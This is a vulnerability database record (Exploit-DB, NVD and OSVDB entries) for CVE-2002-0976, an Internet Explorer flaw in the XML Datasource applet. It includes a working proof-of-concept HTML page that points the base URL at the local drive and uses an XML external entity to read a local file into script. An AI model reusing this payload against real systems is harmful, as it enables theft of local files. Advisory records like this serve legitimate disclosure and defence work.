{"published": "2002-08-17T00:00:00", "id": "EDB-ID:21721", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:NONE/"}, "history": [], "enchantments": {"score": {"value": 2.1, "vector": "NONE"}, "vulnersScore": 2.1}, "hash": "56cc60b4be3e5e8bb57c6e7864fa3ea958c54bff05181ca841238d6fb52bafd4", "description": "Microsoft Internet Explorer 4/5/6 XML Datasource Applet File Disclosure Vulnerability. CVE-2002-0976. Local exploit for windows platform", "type": "exploitdb", "href": "https://www.exploit-db.com/exploits/21721/", "lastseen": "2016-02-02T17:07:15", "edition": 1, "title": "Microsoft Internet Explorer 4/5/6 XML Datasource Applet File Disclosure Vulnerability", "osvdbidlist": ["2977"], "modified": "2002-08-17T00:00:00", "bulletinFamily": "exploit", "cvelist": ["CVE-2002-0976"], "sourceHref": "https://www.exploit-db.com/download/21721/", "references": [], "reporter": "Jelmer", "sourceData": "source: http://www.securityfocus.com/bid/5490/info\r\n\r\nA problem in Microsoft Internet Explorer could lead to the disclosure of sensitive information.\r\n\r\nDue to the design of the datasource applet, it may be possible for a user to view the contents of local files via a remote page. By building a custom-crafted page that specifies the code base as the local system, it would be possible to display the contents of known local files.\r\n\r\n<html>\r\n<head>\r\n<base href=\"file:///C:/\">\r\n</head>\r\n<body>\r\n<applet code=\"com.ms.xml.dso.XMLDSO.class\" width=\"0\" height=\"0\" id=\"xmldso\" MAYSCRIPT=\"true\">\r\n<?xml version=\"1.0\"?>\r\n<!DOCTYPE file [\r\n<!ELEMENT file (#PCDATA) >\r\n<!ENTITY contents SYSTEM \"file:///C:/jelmer.txt\">\r\n]>\r\n<file>\r\n&contents;\r\n</file>\r\n</applet>\r\n<script language=\"javascript\">\r\nsetTimeout(\"showIt()\",2000);\r\nfunction showIt() {\r\nvar jelmer = xmldso.getDocument();\r\nalert(jelmer.Text);\r\n}\r\n</script>\r\n</body>\r\n</html>", "objectVersion": "1.0"}

{"cve": [{"lastseen": "2017-04-18T15:49:46", "references": ["http://www.securityfocus.com/bid/5490", "http://marc.info/?l=bugtraq&m=102960731805373&w=2", "http://www.iss.net/security_center/static/9885.php"], "description": "Internet Explorer 4.0 and later allows remote attackers to read arbitrary files via a web page that accesses a legacy XML Datasource applet (com.ms.xml.dso.XMLDSO.class) and modifies the base URL to point to the local system, which is trusted by the applet.", "edition": 2, "reporter": "NVD", "published": "2002-09-24T00:00:00", "title": "CVE-2002-0976", "type": "cve", "enchantments": {"score": {"modified": "2017-04-18T15:49:46", "vector": "NONE", "value": 5.0}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2002-0976"], "scanner": [], "modified": "2016-10-17T22:23:12", "cpe": ["cpe:/a:microsoft:ie:5.0.1", "cpe:/a:microsoft:ie:4.0.1:sp2", "cpe:/a:microsoft:ie:4.0", "cpe:/a:microsoft:ie:4.0.1", "cpe:/a:microsoft:ie:5.5:sp2", "cpe:/a:microsoft:ie:6.0", "cpe:/a:microsoft:ie:5.5:sp1", "cpe:/a:microsoft:ie:5.0.1:sp2", "cpe:/a:microsoft:ie:5.5", "cpe:/a:microsoft:ie:5.0", "cpe:/a:microsoft:ie:5.0.1:sp1"], "id": "CVE-2002-0976", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0976", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:NONE/"}}], "osvdb": [{"lastseen": "2017-04-28T13:19:57", "references": [], "edition": 1, "description": "## Vulnerability Description\nMicrosoft Internet Explorer may allow remote attackers to read the contents of local files. Due to a flaw in the XML Datasource applet, if \"file:///C:/\" is specified as the codebase reference in the HTML header, the attacker could use the XMLDSO applet to read local files on the system.\n\n\n## Solution Description\nCurrently, there are no known workarounds or upgrades to correct this issue. However, Microsoft has released a patch to address this vulnerability.\n## Short Description\nMicrosoft Internet Explorer may allow remote attackers to read the contents of local files. Due to a flaw in the XML Datasource applet, if \"file:///C:/\" is specified as the codebase reference in the HTML header, the attacker could use the XMLDSO applet to read local files on the system.\n\n\n## References:\nMicrosoft Security Bulletin: MS03-015\nMicrosoft Security Bulletin: MS03-011\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2002-08/0162.html\nISS X-Force ID: 9885\n[CVE-2002-0976](https://vulners.com/cve/CVE-2002-0976)\nBugtraq ID: 5490\n", "reporter": "OSVDB", "published": "2002-08-17T00:00:00", "title": "Microsoft IE XML Datasource Read Local Files", "type": "osvdb", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "affectedSoftware": [{"name": "Internet Explorer", "version": "6.0", "operator": "eq"}, {"name": "Internet Explorer", "version": "5.0", "operator": "eq"}, {"name": "Internet Explorer", "version": "5.0.1", "operator": "eq"}, {"name": "Internet Explorer", "version": "5.5", "operator": "eq"}, {"name": "Internet Explorer", "version": "4.0", "operator": "eq"}], "bulletinFamily": "software", "cvelist": ["CVE-2002-0976"], "modified": "2002-08-17T00:00:00", "id": "OSVDB:2977", "href": "https://vulners.com/osvdb/OSVDB:2977", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:NONE/"}}]}